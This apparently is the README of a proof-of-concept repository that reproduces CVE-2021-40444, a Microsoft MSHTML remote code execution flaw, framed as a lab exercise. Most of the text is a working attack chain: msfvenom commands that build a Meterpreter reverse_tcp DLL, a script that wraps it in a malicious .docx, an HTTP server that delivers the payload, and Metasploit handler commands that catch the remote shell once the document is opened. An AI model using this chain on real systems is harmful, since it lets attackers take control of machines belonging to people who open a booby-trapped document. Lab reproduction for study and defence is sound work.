# CVE-2021-40444-POC
An attempt to reproduce Microsoft MSHTML Remote Code Execution (RCE) Vulnerability using Metasploit Framework.

*works best if not run in FlareVM*

Git clone the repository from

Prepare the `.dll` template to be used later with `msfvenom`

`msfvenom -p windows/meterpreter/reverse_tcp lhost=<SOURCE_IP> lport=<LISTENING_PORT> -f dll -o template.dll`

Copy the newly generated `template.dll` into the `test/` folder of the repository.
Make `template.dll` executable with `chmod +x template.dll`.

Run the generator script to process `template.dll` into the output document:
`python3 generate ~/test/template.dll http://<SOURCE IP>`

The document is then exported into the `out/` folder. Start the HTTP listener on the serving port (default is 80):
`python3 host 80`

Run Metasploit with:
`msfconsole -q`
`use multi/handler`
`set payload windows/meterpreter/reverse_tcp`
`set lhost <SOURCE IP>`

Then send `document.docx` to the vulnerable lab machine and open the `.docx` there.

We will get a response in the `` terminal, and the lab is successful if we are able to spawn a reverse TCP shell.